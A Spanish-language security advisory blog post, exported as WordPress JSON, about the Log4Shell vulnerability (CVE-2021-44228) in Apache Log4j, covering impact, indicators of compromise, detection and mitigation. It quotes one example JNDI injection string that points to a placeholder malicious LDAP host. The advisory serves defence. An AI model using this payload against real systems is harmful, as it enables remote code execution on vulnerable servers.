{"id":5391,"date":"2021-12-15T12:31:33","date_gmt":"2021-12-15T17:31:33","guid":{"rendered":"https:\/\/etek.com\/es\/?p=5391"},"modified":"2021-12-15T12:31:33","modified_gmt":"2021-12-15T17:31:33","slug":"log4shell-vulnerabilidad-critica-en-apache","status":"publish","type":"post","link":"https:\/\/etek.com\/es\/log4shell-vulnerabilidad-critica-en-apache\/","title":{"rendered":"Log4Shell: Vulnerabilidad Critica en Apache"},"content":{"rendered":"\n<p>El 9 de diciembre se inform\u00f3 de una vulnerabilidad cr\u00edtica de ejecuci\u00f3n remota de c\u00f3digo (RCE) en el paquete de registro de Apache Log4j 2 versiones 2.14.1 e inferiores.<\/p>\n\n\n\n<p>Apache Log4j es la biblioteca de registro java m\u00e1s popular, con m\u00e1s de 400.000 descargas en su proyecto GitHub. Es utilizada por un gran n\u00famero de empresas en todo el mundo, permitiendo el registro en un amplio conjunto de aplicaciones populares.<\/p>\n\n\n\n<p>Explotar esta vulnerabilidad es sencillo y permite a los ciberatacantes controlar servidores web basados en java y lanzar ataques de ejecuci\u00f3n remota de c\u00f3digo.<\/p>\n\n\n\n<p>La biblioteca Log4j est\u00e1 integrada en casi todos los servicios o aplicaciones de Internet que conocemos, como Twitter, Amazon, Microsoft, Minecraft y otros.<\/p>\n\n\n\n<p>En la actualidad la mayor\u00eda de los ataques se centran en el uso de la miner\u00eda de criptomonedas a costa de las v\u00edctimas.<\/p>\n\n\n\n<div class=\"wp-block-image is-style-default\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/etek.com\/es\/wp-content\/uploads\/2021\/12\/image-2.png\" alt=\"\" class=\"wp-image-5395\"\/><figcaption>Como se realiza el Ataque log4shell<br \/><\/figcaption><\/figure><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Indicadores de Compromiso (IoC)<\/h3>\n\n\n\n<p>En los siguientes enlaces se podr\u00e1 obtener m\u00e1s informaci\u00f3n a los nuevos Indicadores de Compromisos que diferentes actores de amenazas est\u00e1n utlizando para la ejecuci\u00f3n de la vulnerabilidad:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/github.com\/NCSC-NL\/log4shell\">https:\/\/github.com\/NCSC-NL\/log4shell<\/a><\/li><li><a href=\"https:\/\/github.com\/curated-intel\/Log4Shell-IOCs\">https:\/\/github.com\/curated-intel\/Log4Shell-IOCs<\/a><\/li><li><a href=\"https:\/\/pastebin.com\/\">https:\/\/pastebin.com\/<\/a><a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-actively-exploited\/IOCs-PatchNow-Log4Shell-Vulnerability.txt\">QADArZXJ<\/a><\/li><\/ul>\n\n\n\n<p>La vulnerabilidad ha sido asignada como <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44228\"><strong>CVE-2021-44228<\/strong><\/a><strong> <\/strong>y con una puntuaci\u00f3n CVSS de <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\">10 sobre 10<\/a>. El ciberatacante, para poder explotarla, requiere que la aplicaci\u00f3n registre una cadena especial, una serie de caracteres por ejemplo: ${jndi:ldap:\/\/sitio-malicioso.com\/exp}. Matthew Prince especialista en Seguridad Inform\u00e1tica, en su perfil de <a href=\"https:\/\/twitter.com\/eastdakota\/status\/1469800951351427073\">Twitter<\/a>, informa de evidencias de que el exploit estaba disponible al menos 9 d\u00edas antes de su publicaci\u00f3n.<\/p>\n\n\n\n<p>Al d\u00eda de hoy hay muchos atacantes que est\u00e1n explotando la vulnerabilidad Log4Shell y poder llevar a cabo sus ataques. Pueden, por ejemplo, instalar mineros de criptomonedas en un servidor, convertir los dispositivos afectados en una botnet, introducir alg\u00fan tipo de malware hasta tomar control remoto de los sistemas afectados<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C\u00f3mo Detectar esta vulnerabilidad<\/h3>\n\n\n\n<p>Hay varias formas de hacerlo y una de las m\u00e1s sencillas es <strong>conocer la versi\u00f3n <\/strong><strong>de Log4j <\/strong>que tiene instalada. Las vulnerables van desde la 2.0-beta9 hasta la 2.14.1.<\/p>\n\n\n\n<p>Adem\u00e1s, en <a href=\"https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b\">GitHub <\/a>podemos encontrar los pasos para ejecutar comandos y detectar si la vulnerabilidad registrada como CVE-2021-44228 est\u00e1 presente o no. Este <a href=\"https:\/\/github.com\/Neo23x0\/log4shell-detector\">esc\u00e1ner basado en Python<\/a> act\u00faa como <strong>detector de la vulnerabilidad <\/strong>Log4Shell.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">C\u00f3mo remediar esta vulnerabilidad<\/h3>\n\n\n\n<p>Apache Software Foundation ha publicado un aviso de seguridad para solucionar una vulnerabilidad de ejecuci\u00f3n remota de c\u00f3digo (CVE-2021-44228) que afecta a las versiones 2.0-beta9 a 2.14.1 de Log4j. CISA recomienda a los usuarios y administradores a revisar el anuncio de <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\">Apache Log4j 2.15.0<\/a> y actualizar a <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/download.html\">Log4j 2.15.0<\/a> o aplicar las mitigaciones recomendadas inmediatamente.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/etek.com\/es\/wp-content\/uploads\/2021\/12\/image-3.png\" alt=\"\" class=\"wp-image-5396\"\/><figcaption><br \/>MITRE ATT&amp;CK Tactics and Techniques<\/figcaption><\/figure><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Recomendaciones:<\/h3>\n\n\n\n<p>Se recomienda validar junto con fabricantes que sistemas de los utilizados puedan estar siendo vulnerables y la forma de ejecutar el parche de esta y actualizar las Firmas de los IPS u otras herramientas tipo Zero Day para que ayuden a detectar tr\u00e1fico o comportamientos relacionados. Si no se puede parchar de manera inmediata las instancias vulnerables, puede ser mitigada a trav\u00e9s de los siguientes pasos:<\/p>\n\n\n\n<ul><li>Para &gt;=2.10, establezca la propiedad del sistema log4j2.formatMsgNoLookups a true.<\/li><li>Para &gt;=2.10, establezca la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS a true<\/li><li>Para&nbsp;&nbsp;&nbsp;&nbsp; las&nbsp;&nbsp;&nbsp; versiones&nbsp;&nbsp; 2.0-beta9&nbsp;&nbsp; a&nbsp;&nbsp;&nbsp;&nbsp; 2.10.0,&nbsp;&nbsp; elimine JndiLookup.class&nbsp;de la&nbsp;ruta&nbsp;de&nbsp;clases:zip -q&nbsp;-d&nbsp;log4j core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class.<\/li><li><img decoding=\"async\" width=\"4\" height=\"4\" src=\"\">Limitar el tr\u00e1fico de salida a Internet s\u00f3lo desde los puertos necesarios.<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Para m\u00e1s informaci\u00f3n puede consultar las siguientes fuentes asociadas a la noticia:<\/h3>\n\n\n\n<ul><li><img decoding=\"async\" width=\"4\" height=\"5\" src=\"\"><a href=\"https:\/\/blog.checkpoint.com\/2021\/12\/11\/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1\/\">https:\/\/blog.checkpoint.com\/2021\/12\/11\/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1\/<\/a><\/li><li><a href=\"https:\/\/socradar.io\/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do\/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers\">https:\/\/socradar.io\/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do\/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers<\/a><\/li><li><a href=\"https:\/\/www.larazon.es\/tecnologia\/20211212\/emnq6z4rejgu5fsnerxwbfdesq.html?outputType=amp\">https:\/\/www.larazon.es\/tecnologia\/20211212\/emnq6z4rejgu5fsnerxwbfdesq.html?outputType=amp<\/a><\/li><li><a href=\"https:\/\/www.ccn-cert.cni.es\/seguridad-al-dia\/alertas-ccn-cert\/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html\">https:\/\/www.ccn-cert.cni.es\/seguridad-al-dia\/alertas-ccn-cert\/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html<\/a><\/li><li><a href=\"https:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=KB95091\">https:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=KB95091<\/a><\/li><li><a href=\"https:\/\/supportcenter.checkpoint.com\/supportcenter\/portal?eventSubmit_doGoviewsolutiondetails&amp;solutionid=sk176865&amp;partition=Basic&amp;product=IPS\">https:\/\/supportcenter.checkpoint.com\/supportcenter\/portal?eventSubmit_doGoviewsolutiondetails=&amp;solutionid=sk176865&amp;partition=Basic&amp;product=IPS<\/a><\/li><li><a href=\"https:\/\/www.fortinet.com\/blog\/psirt-blogs\/apache-log4j-vulnerability\">https:\/\/www.fortinet.com\/blog\/psirt-blogs\/apache-log4j-vulnerability<\/a><\/li><li><a href=\"https:\/\/blog.segu-info.com.ar\/2021\/12\/log4shell-vulnerabilidad-critica-con.html\">https:\/\/blog.segu-info.com.ar\/2021\/12\/log4shell-vulnerabilidad-critica-con.html<\/a><\/li><li><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html\">https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html<\/a><\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>El 9 de diciembre se inform\u00f3 de una vulnerabilidad cr\u00edtica de ejecuci\u00f3n remota de c\u00f3digo (RCE) en el paquete de registro de Apache Log4j 2 versiones 2.14.1 e inferiores. Apache Log4j es la biblioteca de registro java m\u00e1s popular, con m\u00e1s de 400.000 descargas en su proyecto GitHub. Es utilizada por un gran n\u00famero de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5384,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts\/5391"}],"collection":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/comments?post=5391"}],"version-history":[{"count":0,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/posts\/5391\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/media?parent=5391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/categories?post=5391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/etek.com\/es\/wp-json\/wp\/v2\/tags?post=5391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}